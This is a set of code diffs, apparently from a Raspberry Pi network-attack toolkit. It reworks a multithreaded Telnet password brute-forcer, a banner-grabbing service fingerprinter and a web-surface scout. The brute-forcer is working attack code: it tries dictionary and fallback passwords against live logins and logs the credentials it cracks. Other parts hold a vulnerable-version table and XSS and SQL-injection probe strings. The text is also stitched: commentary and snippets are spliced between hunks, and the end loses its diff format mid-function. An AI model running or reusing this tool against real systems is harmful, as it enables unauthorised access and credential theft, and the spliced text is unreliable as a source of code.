@@ -15,6 +15,7 @@ from queue import Queue
 from typing import List, Dict, Tuple, Optional

 from shared import SharedData
+from actions.bruteforce_common import ProgressTracker, merged_password_plan
 from logger import Logger

 logger = Logger(name="telnet_bruteforce.py", level=logging.DEBUG)
@@ -43,20 +44,21 @@ class TelnetBruteforce:
         return self.telnet_bruteforce.run_bruteforce(ip, port)

     def execute(self, ip, port, row, status_key):
         """Orchestrator entry point (returns 'success' / 'failed')."""
         logger.info(f"Executing TelnetBruteforce on {ip}:{port}")
         self.shared_data.bjorn_orch_status = "TelnetBruteforce"
+        self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
         success, results = self.bruteforce_telnet(ip, port)
         return 'success' if success else 'failed'


 class TelnetConnector:
     """Handles Telnet attempts, DB persistence, IP→(MAC, hostname) mapping."""

     def __init__(self, shared_data):
         self.shared_data = shared_data
         # Wordlists unchanged
         self.users = self._read_lines(shared_data.users_file)
         self.passwords = self._read_lines(shared_data.passwords_file)
@@ -67,6 +69,7 @@ class TelnetConnector:
         self.lock = threading.Lock()
         self.results: List[List[str]] = []  # [mac, ip, hostname, user, password, port]
         self.queue = Queue()
+        self.progress = None

     # ---------- file utils ----------
     @staticmethod
@@ -110,9 +113,10 @@ class TelnetConnector:
         return self._ip_to_identity.get(ip, (None, None))[1]

     # ---------- Telnet ----------
-    def telnet_connect(self, adresse_ip: str, user: str, password: str) -> bool:
+    def telnet_connect(self, adresse_ip: str, user: str, password: str, port: int = 23, timeout: int = 10) -> bool:
+        timeout = int(getattr(self.shared_data, "telnet_connect_timeout_s", timeout))
         try:
-            tn = telnetlib.Telnet(adresse_ip)
+            tn = telnetlib.Telnet(adresse_ip, port=port, timeout=timeout)
             tn.read_until(b"login: ", timeout=5)
             tn.write(user.encode('ascii') + b"\n")
             if password:
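The reworked signature lets an optional shared-data attribute override the caller's timeout. That `getattr` fallback pattern in isolation (the attribute name comes from the diff; the stub class is hypothetical):

```python
class SharedStub:
    # Present only when the operator configured an override.
    telnet_connect_timeout_s = 4

def effective_timeout(shared, default=10):
    """Return the configured timeout when the attribute exists,
    otherwise the caller-supplied default."""
    return int(getattr(shared, "telnet_connect_timeout_s", default))
```

Because the override is read at call time rather than import time, changing the setting in the shared-data object takes effect on the next connection attempt without a restart.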
@@ -175,14 +179,17 @@ class TelnetConnector:
             adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
             try:
-                if self.telnet_connect(adresse_ip, user, password):
+                if self.telnet_connect(adresse_ip, user, password, port=port):
                     with self.lock:
                         self.results.append([mac_address, adresse_ip, hostname, user, password, port])
                     logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
+                    self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
                     self.save_results()
                     self.removeduplicates()
                     success_flag[0] = True
             finally:
+                if self.progress is not None:
+                    self.progress.advance(1)
                 self.queue.task_done()

             # Optional delay between attempts
@@ -191,46 +198,54 @@ class TelnetConnector:
     def run_bruteforce(self, adresse_ip: str, port: int):
+        self.results = []
         mac_address = self.mac_for_ip(adresse_ip)
         hostname = self.hostname_for_ip(adresse_ip) or ""
-        total_tasks = len(self.users) * len(self.passwords)
+        dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
+        total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
         if total_tasks == 0:
             logger.warning("No users/passwords loaded. Abort.")
             return False, []

-        for user in self.users:
-            for password in self.passwords:
-                if self.shared_data.orchestrator_should_exit:
-                    logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
-                    return False, []
-                self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
+        self.progress = ProgressTracker(self.shared_data, total_tasks)
         success_flag = [False]

-        threads = []
-        thread_count = min(40, max(1, total_tasks))
-        for _ in range(thread_count):
-            t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
-            t.start()
-            threads.append(t)
-
-        while not self.queue.empty():
-            if self.shared_data.orchestrator_should_exit:
-                logger.info("Orchestrator exit signal received, stopping bruteforce.")
-                while not self.queue.empty():
-                    try:
-                        self.queue.get_nowait()
-                        self.queue.task_done()
-                    except Exception:
-                        break
-                break
-
-        self.queue.join()
-        for t in threads:
-            t.join()
-
-        return success_flag[0], self.results
+        def run_phase(passwords):
+            phase_tasks = len(self.users) * len(passwords)
+            if phase_tasks == 0:
+                return
+            for user in self.users:
+                for password in passwords:
+                    if self.shared_data.orchestrator_should_exit:
+                        logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
+                        return
+                    self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
+
+            threads = []
+            thread_count = min(8, max(1, phase_tasks))
+            for _ in range(thread_count):
+                t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
+                t.start()
+                threads.append(t)
+
+            self.queue.join()
+            for t in threads:
+                t.join()
+
+        try:
+            run_phase(dict_passwords)
+            if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
+                logger.info(
+                    f"Telnet dictionary phase failed on {adresse_ip}:{port}. "
+                    f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
+                )
+                run_phase(fallback_passwords)
+            self.progress.set_complete()
+            return success_flag[0], self.results
+        finally:
+            self.shared_data.bjorn_progress = ""

     # ---------- persistence DB ----------
     def save_results(self):
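`merged_password_plan` is imported from `actions.bruteforce_common`, whose implementation is not part of this diff. Based on how `run_bruteforce` uses its return value (a cheap dictionary phase, then an exhaustive fallback over the remaining passwords), a plausible stand-in looks like this sketch (the function name and split rule are assumptions, not the repo's actual code):

```python
def split_password_plan(dictionary, full_list):
    """Hypothetical stand-in for merged_password_plan(): phase 1 tries the
    curated dictionary, phase 2 tries whatever is left in the full wordlist.
    Order is preserved and duplicates are removed across both phases."""
    seen = set()
    phase1 = [p for p in dictionary if not (p in seen or seen.add(p))]
    phase2 = [p for p in full_list if p not in seen and not seen.add(p)]
    return phase1, phase2
```

Whatever the real split is, the two-phase shape is what matters for a Pi Zero: the short high-probability list runs first, and the expensive exhaustive pass only starts when the dictionary phase found nothing.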
@@ -270,3 +285,4 @@ if __name__ == "__main__":
     except Exception as e:
         logger.error(f"Error: {e}")
         exit(1)


@@ -1,214 +1,191 @@
-# Service fingerprinting and version detection tool for vulnerability identification.
-# Saves settings in `/home/bjorn/.settings_bjorn/thor_hammer_settings.json`.
-# Automatically loads saved settings if arguments are not provided.
-# -t, --target     Target IP or hostname to scan (overrides saved value).
-# -p, --ports      Ports to scan (default: common ports, comma-separated).
-# -o, --output     Output directory (default: /home/bjorn/Bjorn/data/output/services).
-# -d, --delay      Delay between probes in seconds (default: 1).
-# -v, --verbose    Enable verbose output for detailed service information.
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+"""
+thor_hammer.py — Service fingerprinting (Pi Zero friendly, orchestrator compatible).
+
+What it does:
+- For a given target (ip, port), tries a fast TCP connect + banner grab.
+- Optionally stores a service fingerprint into DB.port_services via db.upsert_port_service.
+- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
+
+Notes:
+- Avoids spawning nmap per-port (too heavy). If you want nmap, add a dedicated action.
+"""

-import os
-import json
-import socket
-import argparse
-import threading
-from datetime import datetime
 import logging
-from concurrent.futures import ThreadPoolExecutor
-import subprocess
+import socket
+import time
+from typing import Dict, Optional, Tuple
+
+from logger import Logger
+from actions.bruteforce_common import ProgressTracker
+
+logger = Logger(name="thor_hammer.py", level=logging.DEBUG)
-b_class = "ThorHammer"
-b_module = "thor_hammer"
-b_enabled = 0
-
-# Configure logging
-logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
-
-# Default settings
-DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/services"
-DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
-SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "thor_hammer_settings.json")
-DEFAULT_PORTS = [21, 22, 23, 25, 53, 80, 110, 115, 139, 143, 194, 443, 445, 1433, 3306, 3389, 5432, 5900, 8080]
-
-# Service signature database
-SERVICE_SIGNATURES = {
-    21: {
-        'name': 'FTP',
-        'vulnerabilities': {
-            'vsftpd 2.3.4': 'Backdoor command execution',
-            'ProFTPD 1.3.3c': 'Remote code execution'
-        }
-    },
-    22: {
-        'name': 'SSH',
-        'vulnerabilities': {
-            'OpenSSH 5.3': 'Username enumeration',
-            'OpenSSH 7.2p1': 'User enumeration timing attack'
-        }
-    },
-    # Add more signatures as needed
-}
+# -------------------- Action metadata (AST-friendly) --------------------
+b_class = "ThorHammer"
+b_module = "thor_hammer"
+b_status = "ThorHammer"
+b_port = None
+b_parent = None
+b_service = '["ssh","ftp","telnet","http","https","smb","mysql","postgres","mssql","rdp","vnc"]'
+b_trigger = "on_port_change"
+b_priority = 35
+b_action = "normal"
+b_cooldown = 1200
+b_rate_limit = "24/86400"
+b_enabled = 0  # keep disabled by default; enable via Actions UI/DB when ready.
+
+
+def _guess_service_from_port(port: int) -> str:
+    mapping = {
+        21: "ftp",
+        22: "ssh",
+        23: "telnet",
+        25: "smtp",
+        53: "dns",
+        80: "http",
+        110: "pop3",
+        139: "netbios-ssn",
+        143: "imap",
+        443: "https",
+        445: "smb",
+        1433: "mssql",
+        3306: "mysql",
+        3389: "rdp",
+        5432: "postgres",
+        5900: "vnc",
+        8080: "http",
+    }
+    return mapping.get(int(port), "")
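`_guess_service_from_port` is a plain dictionary lookup with an empty-string default. An abridged copy shows the behavior, including the `int()` coercion that lets string ports from the orchestrator work:

```python
def guess_service(port):
    # Same lookup shape as _guess_service_from_port in the diff (table abridged).
    mapping = {21: "ftp", 22: "ssh", 80: "http", 443: "https", 3306: "mysql", 8080: "http"}
    # int() accepts both 22 and "22"; unknown ports fall back to "".
    return mapping.get(int(port), "")
```

The empty-string default matters downstream: `service or None` in the DB upsert turns an unknown service into SQL NULL rather than an empty label.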
 class ThorHammer:
-    def __init__(self, target, ports=None, output_dir=DEFAULT_OUTPUT_DIR, delay=1, verbose=False):
-        self.target = target
-        self.ports = ports or DEFAULT_PORTS
-        self.output_dir = output_dir
-        self.delay = delay
-        self.verbose = verbose
-        self.results = {
-            'target': target,
-            'timestamp': datetime.now().isoformat(),
-            'services': {}
-        }
-        self.lock = threading.Lock()
-
-    def probe_service(self, port):
-        """Probe a specific port for service information."""
-        try:
-            # Initial connection test
-            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-            sock.settimeout(self.delay)
-            result = sock.connect_ex((self.target, port))
-
-            if result == 0:
-                service_info = {
-                    'port': port,
-                    'state': 'open',
-                    'service': None,
-                    'version': None,
-                    'vulnerabilities': []
-                }
-                # Get service banner
-                try:
-                    banner = sock.recv(1024).decode('utf-8', errors='ignore').strip()
-                    service_info['banner'] = banner
-                except:
-                    service_info['banner'] = None
-
-                # Advanced service detection using nmap if available
-                try:
-                    nmap_output = subprocess.check_output(
-                        ['nmap', '-sV', '-p', str(port), '-T4', self.target],
-                        stderr=subprocess.DEVNULL
-                    ).decode()
-                    # Parse nmap output
-                    for line in nmap_output.split('\n'):
-                        if str(port) in line and 'open' in line:
-                            service_info['service'] = line.split()[2]
-                            if len(line.split()) > 3:
-                                service_info['version'] = ' '.join(line.split()[3:])
-                except:
-                    pass
-
-                # Check for known vulnerabilities
-                if port in SERVICE_SIGNATURES:
-                    sig = SERVICE_SIGNATURES[port]
-                    service_info['service'] = service_info['service'] or sig['name']
-                    if service_info['version']:
-                        for vuln_version, vuln_desc in sig['vulnerabilities'].items():
-                            if vuln_version.lower() in service_info['version'].lower():
-                                service_info['vulnerabilities'].append({
-                                    'version': vuln_version,
-                                    'description': vuln_desc
-                                })
-
-                with self.lock:
-                    self.results['services'][port] = service_info
-                if self.verbose:
-                    logging.info(f"Service detected on port {port}: {service_info['service']}")
-
-            sock.close()
-        except Exception as e:
-            logging.error(f"Error probing port {port}: {e}")
+    def __init__(self, shared_data):
+        self.shared_data = shared_data
+
+    def _connect_and_banner(self, ip: str, port: int, timeout_s: float, max_bytes: int) -> Tuple[bool, str]:
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.settimeout(timeout_s)
+        try:
+            if s.connect_ex((ip, int(port))) != 0:
+                return False, ""
+            try:
+                data = s.recv(max_bytes)
+                banner = (data or b"").decode("utf-8", errors="ignore").strip()
+            except Exception:
+                banner = ""
+            return True, banner
+        finally:
+            try:
+                s.close()
+            except Exception:
+                pass
+
+    def execute(self, ip, port, row, status_key) -> str:
+        if self.shared_data.orchestrator_should_exit:
+            return "interrupted"
+        try:
+            port_i = int(port) if str(port).strip() else None
+        except Exception:
+            port_i = None
+
+        # If port is missing, try to infer from row 'Ports' and fingerprint a few.
+        ports_to_check = []
+        if port_i:
+            ports_to_check = [port_i]
+        else:
+            ports_txt = str(row.get("Ports") or row.get("ports") or "")
+            for p in ports_txt.split(";"):
+                p = p.strip()
+                if p.isdigit():
+                    ports_to_check.append(int(p))
+            ports_to_check = ports_to_check[:12]  # Pi Zero guard
+        if not ports_to_check:
+            return "failed"
+
+        timeout_s = float(getattr(self.shared_data, "thor_connect_timeout_s", 1.5))
+        max_bytes = int(getattr(self.shared_data, "thor_banner_max_bytes", 1024))
+        source = str(getattr(self.shared_data, "thor_source", "thor_hammer"))
+        mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
+        hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
+        if ";" in hostname:
+            hostname = hostname.split(";", 1)[0].strip()
+
+        self.shared_data.bjorn_orch_status = "ThorHammer"
+        self.shared_data.bjorn_status_text2 = ip
+        self.shared_data.comment_params = {"ip": ip, "port": str(ports_to_check[0])}
+        progress = ProgressTracker(self.shared_data, len(ports_to_check))
+        try:
+            any_open = False
+            for p in ports_to_check:
+                if self.shared_data.orchestrator_should_exit:
+                    return "interrupted"
+                ok, banner = self._connect_and_banner(ip, p, timeout_s=timeout_s, max_bytes=max_bytes)
+                any_open = any_open or ok
+                service = _guess_service_from_port(p)
+                product = ""
+                version = ""
+                fingerprint = banner[:200] if banner else ""
+                confidence = 0.4 if ok else 0.1
+                state = "open" if ok else "closed"
+                self.shared_data.comment_params = {
+                    "ip": ip,
+                    "port": str(p),
+                    "open": str(int(ok)),
+                    "svc": service or "?",
+                }
+                # Persist to DB if method exists.
+                try:
+                    if hasattr(self.shared_data, "db") and hasattr(self.shared_data.db, "upsert_port_service"):
+                        self.shared_data.db.upsert_port_service(
+                            mac_address=mac or "",
+                            ip=ip,
+                            port=int(p),
+                            protocol="tcp",
+                            state=state,
+                            service=service or None,
+                            product=product or None,
+                            version=version or None,
+                            banner=banner or None,
+                            fingerprint=fingerprint or None,
+                            confidence=float(confidence),
+                            source=source,
+                        )
+                except Exception as e:
+                    logger.error(f"DB upsert_port_service failed for {ip}:{p}: {e}")
+                progress.advance(1)
+            progress.set_complete()
+            return "success" if any_open else "failed"
+        finally:
+            self.shared_data.bjorn_progress = ""
+            self.shared_data.comment_params = {}
+            self.shared_data.bjorn_status_text2 = ""
+
+
+# -------------------- Optional CLI (debug/manual) --------------------
+if __name__ == "__main__":
+    import argparse
+    from shared import SharedData
+
+    parser = argparse.ArgumentParser(description="ThorHammer (service fingerprint)")
+    parser.add_argument("--ip", required=True)
+    parser.add_argument("--port", default="22")
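When the orchestrator passes no usable port, the new `execute()` falls back to the semicolon-separated `Ports` column and caps the list at 12 entries to spare the Pi Zero. That parsing step, extracted as a standalone sketch (the function name is illustrative; the column format and cap come from the diff):

```python
def ports_from_row(port, ports_txt, cap=12):
    """Replicate the fallback in execute(): an explicit port wins, otherwise
    parse the 'Ports' column ('22;80;443'), keep digit entries only, cap it."""
    try:
        port_i = int(port) if str(port).strip() else None
    except (TypeError, ValueError):
        port_i = None
    if port_i:
        return [port_i]
    out = []
    for p in str(ports_txt or "").split(";"):
        p = p.strip()
        if p.isdigit():
            out.append(int(p))
    return out[:cap]
```

Capping after parsing (rather than truncating the raw string) keeps the guard correct even when entries carry stray spaces or non-numeric junk.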
-    def save_results(self):
-        """Save scan results to a JSON file."""
-        try:
-            os.makedirs(self.output_dir, exist_ok=True)
-            timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
-            filename = os.path.join(self.output_dir, f"service_scan_{timestamp}.json")
-            with open(filename, 'w') as f:
-                json.dump(self.results, f, indent=4)
-            logging.info(f"Results saved to (unknown)")
-        except Exception as e:
-            logging.error(f"Failed to save results: {e}")
-
-    def execute(self):
-        """Execute the service scanning and fingerprinting process."""
-        logging.info(f"Starting service scan on {self.target}")
-        with ThreadPoolExecutor(max_workers=10) as executor:
-            executor.map(self.probe_service, self.ports)
-        self.save_results()
-        return self.results
-
-def save_settings(target, ports, output_dir, delay, verbose):
-    """Save settings to JSON file."""
-    try:
-        os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
-        settings = {
-            "target": target,
-            "ports": ports,
-            "output_dir": output_dir,
-            "delay": delay,
-            "verbose": verbose
-        }
-        with open(SETTINGS_FILE, 'w') as f:
-            json.dump(settings, f)
-        logging.info(f"Settings saved to {SETTINGS_FILE}")
-    except Exception as e:
-        logging.error(f"Failed to save settings: {e}")
-
-def load_settings():
-    """Load settings from JSON file."""
-    if os.path.exists(SETTINGS_FILE):
-        try:
-            with open(SETTINGS_FILE, 'r') as f:
-                return json.load(f)
-        except Exception as e:
-            logging.error(f"Failed to load settings: {e}")
-    return {}
-
-def main():
-    parser = argparse.ArgumentParser(description="Service fingerprinting and vulnerability detection tool")
-    parser.add_argument("-t", "--target", help="Target IP or hostname")
-    parser.add_argument("-p", "--ports", help="Ports to scan (comma-separated)")
-    parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
-    parser.add_argument("-d", "--delay", type=float, default=1, help="Delay between probes")
-    parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose output")
     args = parser.parse_args()
-    settings = load_settings()
-    target = args.target or settings.get("target")
-    ports = [int(p) for p in args.ports.split(',')] if args.ports else settings.get("ports", DEFAULT_PORTS)
-    output_dir = args.output or settings.get("output_dir")
-    delay = args.delay or settings.get("delay")
-    verbose = args.verbose or settings.get("verbose")
-    if not target:
-        logging.error("Target is required. Use -t or save it in settings")
-        return
-    save_settings(target, ports, output_dir, delay, verbose)
-    scanner = ThorHammer(
-        target=target,
-        ports=ports,
-        output_dir=output_dir,
-        delay=delay,
-        verbose=verbose
-    )
-    scanner.execute()
-
-if __name__ == "__main__":
-    main()
+    sd = SharedData()
+    act = ThorHammer(sd)
+    row = {"MAC Address": sd.get_raspberry_mac() or "__GLOBAL__", "Hostname": "", "Ports": args.port}
+    print(act.execute(args.ip, args.port, row, "ThorHammer"))


@@ -1,313 +1,396 @@
-# Web application scanner for discovering hidden paths and vulnerabilities.
-# Saves settings in `/home/bjorn/.settings_bjorn/valkyrie_scout_settings.json`.
-# Automatically loads saved settings if arguments are not provided.
-# -u, --url        Target URL to scan (overrides saved value).
-# -w, --wordlist   Path to directory wordlist (default: built-in list).
-# -o, --output     Output directory (default: /home/bjorn/Bjorn/data/output/webscan).
-# -t, --threads    Number of concurrent threads (default: 10).
-# -d, --delay      Delay between requests in seconds (default: 0.1).
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+"""
+valkyrie_scout.py — Web surface scout (Pi Zero friendly, orchestrator compatible).
+
+What it does:
+- Probes a small set of common web paths on a target (ip, port).
+- Extracts high-signal indicators from responses (auth type, login form hints, missing security headers,
+  error/debug strings). No exploitation, no bruteforce.
+- Writes results into DB table `webenum` (tool='valkyrie_scout') so the UI can browse findings.
+- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
+"""

-import os
 import json
-import requests
-import argparse
-from datetime import datetime
 import logging
-import threading
-from concurrent.futures import ThreadPoolExecutor
-from urllib.parse import urljoin
 import re
-from bs4 import BeautifulSoup
+import ssl
+import time
+from http.client import HTTPConnection, HTTPSConnection, RemoteDisconnected
+from typing import Dict, List, Optional, Tuple
+
+from logger import Logger
+from actions.bruteforce_common import ProgressTracker
+
+logger = Logger(name="valkyrie_scout.py", level=logging.DEBUG)
+# -------------------- Action metadata (AST-friendly) --------------------
+b_class = "ValkyrieScout"
+b_module = "valkyrie_scout"
+b_status = "ValkyrieScout"
+b_port = 80
+b_parent = None
+b_service = '["http","https"]'
+b_trigger = "on_web_service"
+b_priority = 50
+b_action = "normal"
+b_cooldown = 1800
+b_rate_limit = "8/86400"
+b_enabled = 0  # keep disabled by default; enable via Actions UI/DB when ready.
+
+# Small default list to keep the action cheap on Pi Zero.
+DEFAULT_PATHS = [
+    "/",
+    "/robots.txt",
+    "/login",
+    "/signin",
+    "/auth",
+    "/admin",
+    "/administrator",
+    "/wp-login.php",
+    "/user/login",
+]
+
+# Keep patterns minimal and high-signal.
+SQLI_ERRORS = [
+    "error in your sql syntax",
+    "mysql_fetch",
+    "unclosed quotation mark",
+    "ora-",
+    "postgresql",
+    "sqlite error",
+]
+
+LFI_HINTS = [
+    "include(",
+    "require(",
+    "include_once(",
+    "require_once(",
+]
+
+DEBUG_HINTS = [
+    "stack trace",
+    "traceback",
+    "exception",
+    "fatal error",
+    "notice:",
+    "warning:",
+    "debug",
+]
-b_class = "ValkyrieScout"
-b_module = "valkyrie_scout"
-b_enabled = 0
-
-# Configure logging
-logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
-
-# Default settings
-DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/webscan"
-DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
-SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "valkyrie_scout_settings.json")
-
-# Common web vulnerabilities to check
-VULNERABILITY_PATTERNS = {
-    'sql_injection': [
-        "error in your SQL syntax",
-        "mysql_fetch_array",
-        "ORA-",
-        "PostgreSQL",
-    ],
-    'xss': [
-        "<script>alert(1)</script>",
-        "javascript:alert(1)",
-    ],
-    'lfi': [
-        "include(",
-        "require(",
-        "include_once(",
-        "require_once(",
-    ]
-}
+def _scheme_for_port(port: int) -> str:
+    https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
+    return "https" if int(port) in https_ports else "http"
+
+
+def _first_hostname_from_row(row: Dict) -> str:
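`_scheme_for_port` picks HTTPS purely from a fixed set of commonly TLS-bearing ports. The same heuristic as a standalone function (the port set is copied from the diff):

```python
def scheme_for_port(port):
    # Ports in this set get https; everything else, including 80 and 8080,
    # gets plain http. int() also accepts string ports from the orchestrator.
    https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
    return "https" if int(port) in https_ports else "http"
```

A port-based guess can of course be wrong for nonstandard deployments, but it avoids a probe-both-schemes round trip, which is the cheaper trade-off on a Pi Zero.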
-class ValkyieScout:
-    def __init__(self, url, wordlist=None, output_dir=DEFAULT_OUTPUT_DIR, threads=10, delay=0.1):
-        self.base_url = url.rstrip('/')
-        self.wordlist = wordlist
-        self.output_dir = output_dir
-        self.threads = threads
-        self.delay = delay
-        self.discovered_paths = set()
-        self.vulnerabilities = []
-        self.forms = []
-        self.session = requests.Session()
-        self.session.headers = {
-            'User-Agent': 'Valkyrie Scout Web Scanner',
-            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
-        }
-        self.lock = threading.Lock()
-
-    def load_wordlist(self):
-        """Load directory wordlist."""
-        if self.wordlist and os.path.exists(self.wordlist):
-            with open(self.wordlist, 'r') as f:
-                return [line.strip() for line in f if line.strip()]
-        return [
-            'admin', 'wp-admin', 'administrator', 'login', 'wp-login.php',
-            'upload', 'uploads', 'backup', 'backups', 'config', 'configuration',
-            'dev', 'development', 'test', 'testing', 'staging', 'prod',
-            'api', 'v1', 'v2', 'beta', 'debug', 'console', 'phpmyadmin',
-            'mysql', 'database', 'db', 'wp-content', 'includes', 'tmp', 'temp'
-        ]
-
-    def scan_path(self, path):
-        """Scan a single path for existence and vulnerabilities."""
-        url = urljoin(self.base_url, path)
-        try:
-            response = self.session.get(url, allow_redirects=False)
-            if response.status_code in [200, 301, 302, 403]:
-                with self.lock:
-                    self.discovered_paths.add({
-                        'path': path,
-                        'url': url,
-                        'status_code': response.status_code,
-                        'content_length': len(response.content),
-                        'timestamp': datetime.now().isoformat()
-                    })
-                # Scan for vulnerabilities
-                self.check_vulnerabilities(url, response)
-                # Extract and analyze forms
-                self.analyze_forms(url, response)
-        except Exception as e:
-            logging.error(f"Error scanning {url}: {e}")
-
-    def check_vulnerabilities(self, url, response):
-        """Check for common vulnerabilities in the response."""
-        try:
-            content = response.text.lower()
-            for vuln_type, patterns in VULNERABILITY_PATTERNS.items():
-                for pattern in patterns:
-                    if pattern.lower() in content:
-                        with self.lock:
-                            self.vulnerabilities.append({
-                                'type': vuln_type,
-                                'url': url,
-                                'pattern': pattern,
-                                'timestamp': datetime.now().isoformat()
-                            })
-            # Additional checks
-            self.check_security_headers(url, response)
-            self.check_information_disclosure(url, response)
-        except Exception as e:
-            logging.error(f"Error checking vulnerabilities for {url}: {e}")
-
-    def analyze_forms(self, url, response):
-        """Analyze HTML forms for potential vulnerabilities."""
-        try:
-            soup = BeautifulSoup(response.text, 'html.parser')
-            forms = soup.find_all('form')
-            for form in forms:
-                form_data = {
-                    'url': url,
-                    'method': form.get('method', 'get').lower(),
-                    'action': urljoin(url, form.get('action', '')),
-                    'inputs': [],
-                    'timestamp': datetime.now().isoformat()
-                }
-                # Analyze form inputs
-                for input_field in form.find_all(['input', 'textarea']):
-                    input_data = {
-                        'type': input_field.get('type', 'text'),
-                        'name': input_field.get('name', ''),
-                        'id': input_field.get('id', ''),
-                        'required': input_field.get('required') is not None
-                    }
-                    form_data['inputs'].append(input_data)
-                with self.lock:
-                    self.forms.append(form_data)
-        except Exception as e:
-            logging.error(f"Error analyzing forms in {url}: {e}")
-
-    def check_security_headers(self, url, response):
-        """Check for missing or misconfigured security headers."""
-        security_headers = {
-            'X-Frame-Options': 'Missing X-Frame-Options header',
-            'X-XSS-Protection': 'Missing X-XSS-Protection header',
-            'X-Content-Type-Options': 'Missing X-Content-Type-Options header',
-            'Strict-Transport-Security': 'Missing HSTS header',
-            'Content-Security-Policy': 'Missing Content-Security-Policy'
-        }
-        for header, message in security_headers.items():
-            if header not in response.headers:
-                with self.lock:
-                    self.vulnerabilities.append({
-                        'type': 'missing_security_header',
-                        'url': url,
-                        'detail': message,
-                        'timestamp': datetime.now().isoformat()
-                    })
-
-    def check_information_disclosure(self, url, response):
-        """Check for information disclosure in response."""
-        patterns = {
-            'email': r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
-            'internal_ip': r'\b(?:192\.168|10\.|172\.(?:1[6-9]|2[0-9]|3[01]))\.\d{1,3}\.\d{1,3}\b',
-            'debug_info': r'(?:stack trace|debug|error|exception)',
-            'version_info': r'(?:version|powered by|built with)'
-        }
-        content = response.text.lower()
-        for info_type, pattern in patterns.items():
-            matches = re.findall(pattern, content, re.IGNORECASE)
-            if matches:
-                with self.lock:
-                    self.vulnerabilities.append({
-                        'type': 'information_disclosure',
-                        'url': url,
-                        'info_type': info_type,
-                        'findings': matches,
-                        'timestamp': datetime.now().isoformat()
-                    })
-
-    def save_results(self):
-        """Save scan results to JSON files."""
-        try:
-            os.makedirs(self.output_dir, exist_ok=True)
-            timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
-            # Save discovered paths
-            if self.discovered_paths:
-                paths_file = os.path.join(self.output_dir, f"paths_{timestamp}.json")
-                with open(paths_file, 'w') as f:
-                    json.dump(list(self.discovered_paths), f, indent=4)
-            # Save vulnerabilities
-            if self.vulnerabilities:
-                vulns_file = os.path.join(self.output_dir, f"vulnerabilities_{timestamp}.json")
-                with open(vulns_file, 'w') as f:
-                    json.dump(self.vulnerabilities, f, indent=4)
-            # Save form analysis
-            if self.forms:
-                forms_file = os.path.join(self.output_dir, f"forms_{timestamp}.json")
-                with open(forms_file, 'w') as f:
-                    json.dump(self.forms, f, indent=4)
-            logging.info(f"Results saved to {self.output_dir}")
-        except Exception as e:
-            logging.error(f"Failed to save results: {e}")
-
-    def execute(self):
-        """Execute the web application scan."""
-        try:
-            logging.info(f"Starting web scan on {self.base_url}")
-            paths = self.load_wordlist()
with ThreadPoolExecutor(max_workers=self.threads) as executor:
executor.map(self.scan_path, paths)
self.save_results()
except Exception as e:
logging.error(f"Scan error: {e}")
finally:
self.session.close()
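The `check_information_disclosure` method above is essentially `re.findall` over a table of patterns; a standalone sketch of that idea (pattern subset copied from the class, helper name hypothetical):

```python
import re

# Subset of the disclosure patterns used by check_information_disclosure above.
PATTERNS = {
    "email": r"[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}",
    "internal_ip": r"\b(?:192\.168|10\.|172\.(?:1[6-9]|2[0-9]|3[01]))\.\d{1,3}\.\d{1,3}\b",
}

def find_disclosures(body: str) -> dict:
    """Return {info_type: [matches]} for every pattern that fires."""
    findings = {}
    for info_type, pattern in PATTERNS.items():
        matches = re.findall(pattern, body, re.IGNORECASE)
        if matches:
            findings[info_type] = matches
    return findings

hits = find_disclosures("Contact admin@example.com, backend at 192.168.1.10")
```

Note that because the class lowercases the body first, the `re.IGNORECASE` flag is mostly belt-and-braces in the original.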
def save_settings(url, wordlist, output_dir, threads, delay):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"url": url,
"wordlist": wordlist,
"output_dir": output_dir,
"threads": threads,
"delay": delay
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
